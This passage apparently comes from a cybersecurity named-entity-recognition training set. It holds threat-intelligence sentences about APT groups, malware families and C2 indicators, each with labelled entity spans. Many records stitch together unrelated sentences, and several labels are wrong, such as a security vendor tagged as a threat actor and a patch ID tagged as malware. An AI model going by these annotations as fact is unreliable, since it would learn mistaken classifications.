relying on Excel and Word documents containing malicious macros . We successfully unpacked the initial sample we found dropped by the UPX unpacker .", "spans": {"TOOL: UPX unpacker": [[228, 240]]}, "info": {"id": "cyberner_stix_train_000608", "source": "cyberner_stix_train"}} {"text": "The only active target list observed in the wild is available in the appendix and contains a total of 30 unique targets . 
The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"THREAT_ACTOR: SectorJ04": [[148, 157]], "THREAT_ACTOR: BRONZE BUTLER": [[257, 270]], "VULNERABILITY: zero-day": [[326, 334]]}, "info": {"id": "cyberner_stix_train_000609", "source": "cyberner_stix_train"}} {"text": "delivery : to deliver specified text to all victim ’ s contacts ( SMS worming ) . We assess this activity was carried out by a suspected Iranian cyber espionage threat group , whom we refer to as APT34 , using a custom PowerShell backdoor to achieve its objectives . This particular RAT attempts to target a very specific set of Arabic-speaking countries . Change it Up in 2023 Get Ahead of Known Vulnerabilities", "spans": {"THREAT_ACTOR: cyber espionage threat group": [[145, 173]], "THREAT_ACTOR: APT34": [[196, 201]], "TOOL: custom PowerShell backdoor": [[212, 238]], "TOOL: RAT": [[283, 286]]}, "info": {"id": "cyberner_stix_train_000610", "source": "cyberner_stix_train"}} {"text": "The other is a custom utility which , despite its large size , has limited functionality and acts as a tunnel , possibly used by the attackers to maintain persistence within the compromised network .", "spans": {}, "info": {"id": "cyberner_stix_train_000611", "source": "cyberner_stix_train"}} {"text": "Unit 42 and others have shown in the first half of 2018 how this threat actor group continues to target multiple organizations throughout the world with a strong emphasis on government , diplomatic and other strategic organizations primarily in North America and Europe .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]]}, "info": {"id": "cyberner_stix_train_000612", "source": 
"cyberner_stix_train"}} {"text": "Handover from initial module to the main payload As mentioned , the initial handover component called triggerInfection with an instance of appObj and a method that returns the value for the variable config . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon . Among these 5 tools, only WinZip and Windows’ unzIP S-TOOL were not able to extract anything from the ZIP file as they encountered an error at the start of the extraction . The hacking and defacement of a U.S. Government system in which the attackers post messages disparaging remarks about capitalism or democracy would be a solid example of hacktivism .", "spans": {"THREAT_ACTOR: group": [[228, 233]], "THREAT_ACTOR: Vixen Panda": [[238, 249]], "THREAT_ACTOR: Ke3chang": [[252, 260]], "THREAT_ACTOR: Royal APT": [[263, 272]], "THREAT_ACTOR: Playful Dragon": [[279, 293]], "TOOL: WinZip": [[322, 328]], "TOOL: unzIP S-TOOL": [[342, 354]], "ORGANIZATION: U.S. Government system": [[501, 523]], "THREAT_ACTOR: attackers": [[537, 546]]}, "info": {"id": "cyberner_stix_train_000613", "source": "cyberner_stix_train"}} {"text": "The Trick , also known as Trickbot , is another banking Trojan that TA505 first began distributing in June of 2017 , although we have observed The Trick in the wild since fall 2016 , usually in regionally targeted campaigns .", "spans": {"MALWARE: Trick": [[4, 9], [147, 152]], "MALWARE: Trickbot": [[26, 34]], "MALWARE: Trojan": [[56, 62]], "THREAT_ACTOR: TA505": [[68, 73]]}, "info": {"id": "cyberner_stix_train_000614", "source": "cyberner_stix_train"}} {"text": "It mainly targets Chinese users , but has also successfully affected people and organizations in the United States , United Kingdom , Thailand , Spain , and Ireland . 
The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea .", "spans": {"MALWARE: Okrum": [[219, 224]], "THREAT_ACTOR: Lazarus Group": [[451, 464]]}, "info": {"id": "cyberner_stix_train_000615", "source": "cyberner_stix_train"}} {"text": "backdoor , Sednit , Seduploader , JHUHUGIT , Sofacy .", "spans": {"MALWARE: Sednit": [[11, 17]], "MALWARE: Seduploader": [[20, 31]], "MALWARE: JHUHUGIT": [[34, 42]], "MALWARE: Sofacy": [[45, 51]]}, "info": {"id": "cyberner_stix_train_000616", "source": "cyberner_stix_train"}} {"text": "This trend continued until late September 2017 , when we saw Magnitude EK focus primarily on the APAC region , with a large chunk targeting South Korea . Other groups attributed to Iranian attackers , such as Rocket Kitten , have targeted Iranian individuals in the past , including anonymous proxy users , researchers , journalists , and dissidents .", "spans": {"TOOL: Magnitude EK": [[61, 73]], "THREAT_ACTOR: groups": [[160, 166]], "THREAT_ACTOR: attackers": [[189, 198]], "THREAT_ACTOR: Rocket Kitten": [[209, 222]], "ORGANIZATION: anonymous proxy users": [[283, 304]], "ORGANIZATION: researchers": [[307, 318]], "ORGANIZATION: journalists": [[321, 332]], "ORGANIZATION: dissidents": [[339, 349]]}, "info": {"id": "cyberner_stix_train_000617", "source": "cyberner_stix_train"}} {"text": "With our interest piqued , we pivoted on the import hashes ( also known as an imphash ) , which captures the import table of a given file .", "spans": {}, "info": {"id": "cyberner_stix_train_000618", "source": "cyberner_stix_train"}} {"text": "Attempts to sign malware with code-signing certificates have become more common as the Internet and security systems have moved towards a more 
trust and reputation oriented model .", "spans": {}, "info": {"id": "cyberner_stix_train_000619", "source": "cyberner_stix_train"}} {"text": "There was no open-source footprint for the remaining 42 addresses , suggesting that TG-4127 acquired them from another source , possibly other intelligence activity .", "spans": {"THREAT_ACTOR: TG-4127": [[84, 91]]}, "info": {"id": "cyberner_stix_train_000620", "source": "cyberner_stix_train"}} {"text": "Read more about Dragos ’ approach to categorizing threat activity and attribution .", "spans": {"ORGANIZATION: Dragos": [[16, 22]]}, "info": {"id": "cyberner_stix_train_000621", "source": "cyberner_stix_train"}} {"text": "Svpeng In mid-July , we detected Trojan-SMS.AndroidOS.Svpeng.a which , unlike its SMS Trojan counterparts , is focused on stealing money from the victiim ’ s bank account rather than from his mobile phone . This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan . The Winnti Group is still actively using one of its flagship backdoors , ShadowPad , this time against Hong Kong universities . 
None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"MALWARE: Svpeng": [[0, 6]], "MALWARE: Trojan-SMS.AndroidOS.Svpeng.a": [[33, 62]], "THREAT_ACTOR: Tropic Trooper": [[282, 296]], "ORGANIZATION: government institutions": [[314, 337]], "ORGANIZATION: energy industry": [[351, 366]], "THREAT_ACTOR: Winnti Group": [[383, 395]], "MALWARE: backdoors": [[440, 449]], "MALWARE: ShadowPad": [[452, 461]], "ORGANIZATION: CrowdStrike Services": [[545, 565]], "THREAT_ACTOR: Play ransomware intrusions": [[594, 620]], "TOOL: Microsoft Exchange": [[671, 689]]}, "info": {"id": "cyberner_stix_train_000622", "source": "cyberner_stix_train"}} {"text": "EventBot screenPinPrefs.xml The content of screenPinPrefs.xml . The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks .", "spans": {"MALWARE: malware": [[68, 75]], "MALWARE: PowerShell command": [[216, 234]], "TOOL: PowerShell": [[273, 283]], "MALWARE: PupyRAT": [[303, 310]], "MALWARE: research and penetration-testing tool": [[315, 352]]}, "info": {"id": "cyberner_stix_train_000623", "source": "cyberner_stix_train"}} {"text": "Hermes ransomware , the predecessor to Ryuk , was first distributed in February 2017 . 
When conducting programmatic espionage activity , it can presumably become quite confusing if the attacker targets a heavy industry company , an avionics program , and seven other unique targets as to which infected host you will collect what information from .", "spans": {"TOOL: Hermes ransomware": [[0, 17]], "TOOL: Ryuk": [[39, 43]], "ORGANIZATION: heavy industry company": [[204, 226]]}, "info": {"id": "cyberner_stix_train_000624", "source": "cyberner_stix_train"}} {"text": "Our research team analyzed the malicious Android application that is most likely being spread by TrickBot and dubbed it “ TrickMo. ” Targeting users in Germany at this time , TrickMo is the latest variation in the transaction authentication number ( TAN ) -stealing malware category . Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . Interestingly , the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017 .", "spans": {"SYSTEM: Android": [[41, 48]], "MALWARE: TrickBot": [[97, 105]], "MALWARE: TrickMo.": [[122, 130]], "MALWARE: TrickMo": [[175, 182]], "VULNERABILITY: exploit": [[350, 357]], "VULNERABILITY: CVE-2017-11882 vulnerability": [[366, 394]], "THREAT_ACTOR: OilRig group": [[497, 509]]}, "info": {"id": "cyberner_stix_train_000625", "source": "cyberner_stix_train"}} {"text": "Today we are sharing this information to raise awareness of these risks across the industry and calling for better enterprise integration of IoT devices , particularly the ability to monitor IoT device telemetry within enterprise networks .", "spans": {"TOOL: IoT": [[141, 144], [191, 194]]}, "info": {"id": "cyberner_stix_train_000626", "source": "cyberner_stix_train"}} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . 
Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 .", "spans": {"TOOL: python script": [[63, 76]], "VULNERABILITY: CVE-2017-0144": [[132, 145]], "MALWARE: errr.aspx": [[194, 203]], "FILEPATH: decoy slideshow": [[223, 238]]}, "info": {"id": "cyberner_stix_train_000627", "source": "cyberner_stix_train"}} {"text": "Therefore , the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet , as many suspect . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian .", "spans": {"TOOL: Stuxnet MOF": [[16, 27]], "ORGANIZATION: NSA": [[138, 141]], "TOOL: Stuxnet": [[171, 178]], "ORGANIZATION: citizens": [[270, 278]]}, "info": {"id": "cyberner_stix_train_000628", "source": "cyberner_stix_train"}} {"text": "Finally , depending on how interesting the victim is , they malware operators may deploy another custom backdoor .", "spans": {}, "info": {"id": "cyberner_stix_train_000629", "source": "cyberner_stix_train"}} {"text": "These characteristics suggest that the threat group is well resourced and has access to a tools development team and a team focused on SWCs .", "spans": {"TOOL: SWCs": [[135, 139]]}, "info": {"id": "cyberner_stix_train_000631", "source": "cyberner_stix_train"}} {"text": "Chrysaor is spyware believed to be created by NSO Group Technologies , specializing in the creation and sale of software and infrastructure for targeted attacks . Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East . APT33 : 192.119.15.40 [REDACTED].ddns.net . 
None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": {"MALWARE: Chrysaor": [[0, 8]], "ORGANIZATION: NSO Group Technologies": [[46, 68]], "THREAT_ACTOR: Leafminer": [[184, 193]], "TOOL: JavaScript code": [[224, 239]], "TOOL: compromised websites": [[251, 271]], "THREAT_ACTOR: APT33": [[293, 298]], "IP_ADDRESS: 192.119.15.40": [[301, 314]], "DOMAIN: [REDACTED].ddns.net": [[315, 334]]}, "info": {"id": "cyberner_stix_train_000632", "source": "cyberner_stix_train"}} {"text": "Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM , following our internal practice of assigning rogue actors chemical element names . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "THREAT_ACTOR: TERBIUM": [[83, 90]], "MALWARE: Carbanak": [[196, 204]], "THREAT_ACTOR: criminals": [[271, 280]], "ORGANIZATION: financial industry": [[321, 339]], "ORGANIZATION: customers": [[363, 372]]}, "info": {"id": "cyberner_stix_train_000633", "source": "cyberner_stix_train"}} {"text": "Secondly , some of the MiniDuke components do not contain a hardcoded C&C server address , but instead obtain the address of a current C&C server via Twitter .", "spans": {"MALWARE: MiniDuke": [[23, 31]], "TOOL: C&C": [[70, 73], [135, 138]], "TOOL: Twitter": [[150, 157]]}, "info": {"id": "cyberner_stix_train_000634", "source": "cyberner_stix_train"}} {"text": "In the most recent case , the choice of the payload zip file depends on the device process architecture . We identified two methods to deliver the KerrDown downloader to targets . 
The group is known for frequently changing malware and driving global trends in criminal malware distribution .", "spans": {"ORGANIZATION: We": [[106, 108]], "MALWARE: KerrDown": [[147, 155]]}, "info": {"id": "cyberner_stix_train_000635", "source": "cyberner_stix_train"}} {"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . The Tropic Trooper threat actor group has been known to target governments and organizations in the Asia Pacific region for at least six years .", "spans": {"MALWARE: etool.exe": [[99, 108]], "VULNERABILITY: CVE-2017-0144": [[150, 163]], "MALWARE: MS07-010": [[189, 197]], "MALWARE: checker1.exe": [[198, 210]], "MALWARE: PsExec": [[295, 301]], "MALWARE: psexec.exe": [[322, 332]], "THREAT_ACTOR: Tropic Trooper threat actor group": [[339, 372]], "ORGANIZATION: governments": [[398, 409]]}, "info": {"id": "cyberner_stix_train_000636", "source": "cyberner_stix_train"}} {"text": "The fact the trojan can steal both the victim ’ s credentials and also can control their SMS messages and generated 2FA codes means DEFENSOR ID ’ s operators can bypass two-factor authentication . On June 18 , the majority of the campaign’s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note” or Confirmation . 
This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": {"MALWARE: DEFENSOR ID": [[132, 143]], "THREAT_ACTOR: Lazarus": [[388, 395]], "TOOL: emails": [[416, 422]], "ORGANIZATION: Bitcoin users": [[473, 486]], "ORGANIZATION: financial organizations": [[498, 521]]}, "info": {"id": "cyberner_stix_train_000637", "source": "cyberner_stix_train"}} {"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code .", "spans": {"TOOL: WannaCry": [[0, 8]], "MALWARE: .WCRY": [[47, 52]], "MALWARE: Bookworm": [[207, 215]], "MALWARE: Trojan": [[222, 228]], "TOOL: C2": [[263, 265]]}, "info": {"id": "cyberner_stix_train_000638", "source": "cyberner_stix_train"}} {"text": "We have observed this trojan being submitted to public antivirus testing platforms , once as a package and once for each DLL to determine the detection ratio . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . 
We can confirm that the APT38 operator activity is linked to the North Korean regime , but maintains a set of common characteristics , including motivation , malware , targeting , and TTPs that set it apart from other statesponsored operations .", "spans": {"THREAT_ACTOR: LYCEUM": [[160, 166]], "TOOL: maldocs": [[187, 194]]}, "info": {"id": "cyberner_stix_train_000639", "source": "cyberner_stix_train"}} {"text": "One such interesting example was “ ПЛАН_РЕАЛИЗАЦИИ_ПРОЕКТА.rar ” ( SHA256 b5c208e4fb8ba255883f771d384ca85566c7be8adcf5c87114a62efb53b73fda ) .", "spans": {"FILEPATH: ПЛАН_РЕАЛИЗАЦИИ_ПРОЕКТА.rar": [[35, 62]], "FILEPATH: b5c208e4fb8ba255883f771d384ca85566c7be8adcf5c87114a62efb53b73fda": [[74, 138]]}, "info": {"id": "cyberner_stix_train_000640", "source": "cyberner_stix_train"}} {"text": "Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": {"ORGANIZATION: aerospace": [[53, 62]], "ORGANIZATION: energy sectors": [[67, 81]], "THREAT_ACTOR: APT33": [[101, 106]], "ORGANIZATION: government": [[178, 188]], "ORGANIZATION: military": [[192, 200]], "VULNERABILITY: CVE-2012-0158": [[292, 305]]}, "info": {"id": "cyberner_stix_train_000641", "source": "cyberner_stix_train"}} {"text": "Capabilities and functionality In 2013 , we detected several technological innovations developed and used by criminals in their malicious software . TAA triggered an alert at a large telecoms operator in Southeast Asia . Notice the “ Servcie ” typo . 
Based on these symbols , Mandiant assesses with moderate confidence that com.docker.vmnat was a version of the FULLHOUSE.DOORED backdoor .", "spans": {"ORGANIZATION: TAA": [[149, 152]], "ORGANIZATION: telecoms operator": [[183, 200]], "MALWARE: com.docker.vmnat": [[324, 340]], "MALWARE: the FULLHOUSE.DOORED backdoor": [[358, 387]]}, "info": {"id": "cyberner_stix_train_000642", "source": "cyberner_stix_train"}} {"text": "The encrypted body is composed of various identifiers which are joined together : doFinal ( ) is called to encrypt the device information string : The user agent string is built from the package name and IMEI number : Finally the HTTP request is sent to the server at https : //54.71.249.137/eddd0317-2bdc-4140-86cb-0e8d7047b874 . ISMDoor is able to exfiltrate data , take screenshots , and execute arbitrary commands on the victim 's machine . The malicious documents , the droppers and the RAT itself are developed around cloud providers . The PDF usually named “ CriticalBreachDetected.pdf ” is generated using content embedded in the ransomware binary , including the skeleton PDF and the ransom note .", "spans": {"TOOL: ISMDoor": [[331, 338]], "TOOL: RAT": [[492, 495]], "TOOL: cloud providers": [[524, 539]]}, "info": {"id": "cyberner_stix_train_000643", "source": "cyberner_stix_train"}} {"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files . Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" .", "spans": {"TOOL: Hermes": [[20, 26]], "TOOL: Ryuk": [[30, 34], [45, 49]], "TOOL: AES": [[84, 87]], "TOOL: RSA": [[107, 110]], "THREAT_ACTOR: Securelist": [[143, 153]], "THREAT_ACTOR: ScarCruft": [[233, 242]]}, "info": {"id": "cyberner_stix_train_000644", "source": "cyberner_stix_train"}} {"text": "Device registration This is the last of the three main timers that are created . 
More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites — a technique known as online skimming — thereby stealing payment card data transmitted to the vendor by unsuspecting customers . In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": {"THREAT_ACTOR: ITG08": [[97, 102]], "ORGANIZATION: e-commerce environments": [[131, 154]], "THREAT_ACTOR: APT37": [[378, 383]], "ORGANIZATION: board member": [[450, 462]], "ORGANIZATION: financial company": [[483, 500]]}, "info": {"id": "cyberner_stix_train_000645", "source": "cyberner_stix_train"}} {"text": "This is a better implementation , as it allows servers and clients from different versions to communicate with each other to some extent .", "spans": {}, "info": {"id": "cyberner_stix_train_000646", "source": "cyberner_stix_train"}} {"text": "It even has its own virtual keyboard that supposedly protects the victim from keyloggers . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . 
Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": {"MALWARE: MXI Player": [[91, 101]], "THREAT_ACTOR: actor": [[287, 292]], "ORGANIZATION: maritime industries": [[323, 342]], "ORGANIZATION: naval defense contractors": [[345, 370]], "ORGANIZATION: research institutions": [[388, 409]]}, "info": {"id": "cyberner_stix_train_000647", "source": "cyberner_stix_train"}} {"text": "Malicious iOS profile In the case of Apple devices , the downloaded malicious iOS profile gathers the following : Unique device identifier ( UDID ) International Mobile Equipment Identity ( IMEI ) Integrated Circuit Card ID ( ICCID ) Mobile equipment identifier ( MEID ) Version number Product number The profile installations differ depending on the iOS . Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc . When set in text receive mode, the malware uses the AdrGen function to create another query string with the r (receiver) flag and a W (wait) action . At Talos , we pride ourselves on the quality of the intelligence we publish .", "spans": {"SYSTEM: iOS": [[10, 13], [78, 81], [351, 354]], "SYSTEM: Apple": [[37, 42]], "THREAT_ACTOR: Numbered Panda": [[357, 371]], "THREAT_ACTOR: DYNCALC": [[458, 465]], "THREAT_ACTOR: IXESHE": [[468, 474]], "THREAT_ACTOR: JOY RAT": [[477, 484]], "THREAT_ACTOR: APT-12": [[487, 493]], "ORGANIZATION: Talos": [[655, 660]]}, "info": {"id": "cyberner_stix_train_000648", "source": "cyberner_stix_train"}} {"text": "After making headlines during 2016 due to its involvement in cyber attacks against an organization involved in the U.S. 
presidential election , APT28 ( aka Swallowtail , Fancy Bear ) has continued to mount operations during 2017 and 2018 .", "spans": {"ORGANIZATION: presidential election": [[120, 141]], "THREAT_ACTOR: APT28": [[144, 149]], "THREAT_ACTOR: Swallowtail": [[156, 167]], "THREAT_ACTOR: Fancy Bear": [[170, 180]]}, "info": {"id": "cyberner_stix_train_000649", "source": "cyberner_stix_train"}} {"text": "The attack group then used these stolen credentials to gain access to the DNC network , install malware , move across the network , and steal data , including a trove of emails .", "spans": {"ORGANIZATION: DNC": [[74, 77]], "TOOL: emails": [[170, 176]]}, "info": {"id": "cyberner_stix_train_000650", "source": "cyberner_stix_train"}} {"text": "We 've seen this actor rely heavily on phishing campaigns to trick victims into downloading their malicious apps , specifically on Facebook . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report . However, starting from 7Zip version 9.34 (next available installer after version 9.22) up to its latest version 19.0, 7zip saw and was able to extract the image file order.jpg . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": {"SYSTEM: Facebook": [[131, 139]], "ORGANIZATION: Novetta": [[195, 202]], "TOOL: 7Zip": [[279, 283]], "TOOL: 7zip": [[374, 378]], "FILEPATH: order.jpg": [[422, 431]], "MALWARE: COSMICENERGY": [[446, 458]]}, "info": {"id": "cyberner_stix_train_000651", "source": "cyberner_stix_train"}} {"text": "Last week iSIGHT 's sources provided us with the same KillDisk malware published by Rob Lee of SANS and Dragos Security . 
Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek — the CEOs of Facebook , Twitter , Google and Spotify , respectively — have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": {"ORGANIZATION: iSIGHT": [[10, 16]], "TOOL: KillDisk malware": [[54, 70]], "ORGANIZATION: SANS": [[95, 99]], "ORGANIZATION: Dragos Security": [[104, 119]], "ORGANIZATION: Mark Zuckerberg": [[122, 137]], "ORGANIZATION: Jack Dorsey": [[140, 151]], "ORGANIZATION: Sundar Pichai": [[154, 167]], "ORGANIZATION: Daniel Ek": [[174, 183]], "ORGANIZATION: CEOs": [[190, 194]], "ORGANIZATION: Facebook": [[198, 206]], "ORGANIZATION: Twitter": [[209, 216]], "ORGANIZATION: Google": [[219, 225]], "ORGANIZATION: technology": [[348, 358]]}, "info": {"id": "cyberner_stix_train_000652", "source": "cyberner_stix_train"}} {"text": "∗ android.permission.WRITE_SETTINGS ( read/write global system settings ) ∗ android.permission.RECEIVE_SMS ( intercept SMS messages ) ∗ android.permission.READ_PHONE_STATE ( read phone details of the device such as phone number and serial number ) ∗ android.permission.CHANGE_WIFI_STATE ( connect to and disconnect from Wi-Fi networks and make changes to configured networks ) ∗ android.permission.READ_CONTACTS ( read all contact data ) * android.permission.READ_SMS However , the attack is different in two respects : unlike other APTs , the main focus of Blue Termite is to attack Japanese organizations ; and most of their C2s are located in Japan . Organizations with high financial or intellectual property value should take the time to ensure their security requirements are met and that employee ’s are educated about the security threats their organizations face . 
In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": {"TOOL: Blue Termite": [[558, 570]], "SYSTEM: Google Analytics": [[986, 1002]]}, "info": {"id": "cyberner_stix_train_000653", "source": "cyberner_stix_train"}} {"text": "From there , root-level apps can read or modify data and resources that would be off-limits to normal apps . CTU researchers also identified components in the custom C2 protocol being used ( the way in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously . APT33 : 192.119.15.35 mynetwork.ddns.net . The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below .", "spans": {"ORGANIZATION: CTU": [[109, 112]], "TOOL: custom C2 protocol": [[159, 177]], "THREAT_ACTOR: Nickel Academy": [[296, 310]], "THREAT_ACTOR: Lazarus": [[313, 320]], "THREAT_ACTOR: APT33": [[336, 341]], "IP_ADDRESS: 192.119.15.35": [[344, 357]], "DOMAIN: mynetwork.ddns.net": [[358, 376]], "THREAT_ACTOR: pretend to be a cybersecurity organization": [[405, 447]]}, "info": {"id": "cyberner_stix_train_000654", "source": "cyberner_stix_train"}} {"text": "is very similar to newer ones , but it provides additional insights being not obfuscated : Firstly we can notice that , instead of generic domain names or IP addresses , these samples communicated with a Command & Control server located at attiva.exodus.esurv [ . Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible . Downloads additional payloads . 
Limited forensic evidence existed to determine exactly how STRATOFEAR was deployed to systems in the victim environment ; however , in each instance , STRATOFEAR was preceded by the deployment of FULLHOUSE.DOORED .", "spans": {"TOOL: Taidoor malware": [[305, 320]], "MALWARE: STRATOFEAR": [[492, 502], [584, 594]], "MALWARE: FULLHOUSE.DOORED": [[629, 645]]}, "info": {"id": "cyberner_stix_train_000655", "source": "cyberner_stix_train"}} {"text": "CTU researchers have no evidence of other threat actors using RCSession or of wide proliferation of the tool , suggesting it may be exclusively used by BRONZE PRESIDENT .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "MALWARE: RCSession": [[62, 71]], "THREAT_ACTOR: BRONZE PRESIDENT": [[152, 168]]}, "info": {"id": "cyberner_stix_train_000656", "source": "cyberner_stix_train"}} {"text": "Assuming these checks pass , one of the main ELF libraries is loaded that orchestrates other components and provides functionality to the app ’ s Dalvik code through the Java Native Interface ( JNI ) . APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 . APT28 espionage activity has primarily targeted entities in the U.S. 
, Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"THREAT_ACTOR: APT41": [[202, 207]], "ORGANIZATION: medical device companies": [[226, 250]], "ORGANIZATION: governments": [[588, 599]], "ORGANIZATION: militaries": [[604, 614]], "ORGANIZATION: defense attaches": [[617, 633]], "ORGANIZATION: media entities": [[636, 650]], "ORGANIZATION: dissidents": [[657, 667]], "ORGANIZATION: figures": [[672, 679]], "ORGANIZATION: Russian government": [[703, 721]]}, "info": {"id": "cyberner_stix_train_000657", "source": "cyberner_stix_train"}} {"text": "This is similar to the way in which the toolset was being spread via trojanized applications in torrent files during the summer of 2013 .", "spans": {}, "info": {"id": "cyberner_stix_train_000658", "source": "cyberner_stix_train"}} {"text": "A good write-up from 2014 on the malware can be found in this writeup from Yury Namestnikov , Vladimir Kuskov , Oleg Kupreev at Kaspersky Lab here and indicates that the returned data is an RC4 encrypted loader that sets-up the main Chthonic module which can download additional modules or malware .", "spans": {"MALWARE: Chthonic": [[233, 241]]}, "info": {"id": "cyberner_stix_train_000659", "source": "cyberner_stix_train"}} {"text": "“ In the future , we can expect that the bad guys will try to make use of Facebook statuses or deploy LinkedIn and other social networks ” , states ESET ’ s researcher . Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own . 
To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry .", "spans": {"SYSTEM: Facebook": [[74, 82]], "SYSTEM: LinkedIn": [[102, 110]], "ORGANIZATION: ESET": [[148, 152]], "THREAT_ACTOR: actors": [[199, 205]], "TOOL: scripts": [[218, 225]], "TOOL: templates": [[230, 239]], "THREAT_ACTOR: Lazarus group": [[328, 341]], "ORGANIZATION: financial industry": [[426, 444]]}, "info": {"id": "cyberner_stix_train_000660", "source": "cyberner_stix_train"}} {"text": "The kit we found is in tgz format , though we have observed some samples disguised as png or jpg .", "spans": {"TOOL: tgz": [[23, 26]], "TOOL: png": [[86, 89]], "TOOL: jpg": [[93, 96]]}, "info": {"id": "cyberner_stix_train_000661", "source": "cyberner_stix_train"}} {"text": "The high level flow of the exploit is as follows :", "spans": {}, "info": {"id": "cyberner_stix_train_000662", "source": "cyberner_stix_train"}} {"text": "The Trojan has evolved since then , aided by a large-scale distribution campaign by its creators ( in spring-summer 2017 ) , helping Asacub to claim top spots in last year ’ s ranking by number of attacks among mobile banking Trojans , outperforming other families such as Svpeng and Faketoken . Of note , this methodology of naming abstracts away the \" who \" element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events . Based on the Ukranian language embedded in the backdoor , Cybereason raises the possibility that the backdoor was obtained in underground communities by the threat actors , rather than developed in-house by the group . 
The trojan acted like a legitimate application or file in order to trick users into running it .", "spans": {"MALWARE: Asacub": [[133, 139]], "MALWARE: Svpeng": [[273, 279]], "MALWARE: Faketoken": [[284, 293]], "THREAT_ACTOR: XENOTIME": [[370, 378]], "ORGANIZATION: research institution": [[438, 458]], "MALWARE: backdoor": [[618, 626], [672, 680]], "ORGANIZATION: Cybereason": [[629, 639]], "MALWARE: The trojan": [[790, 800]]}, "info": {"id": "cyberner_stix_train_000663", "source": "cyberner_stix_train"}} {"text": "Email account A Gmail account with password is mentioned in the sample ’ s code : It contains the victim ’ s exfiltrated data and “ cmd ” directory with commands for victim devices . We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL–A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified . APT33 : 91.235.142.76 mywinnetwork.ddns.net . If the target system met predefined requirements , the malware used Twitter to look for specific tweets from pre - made accounts created by MiniDuke ’s command and 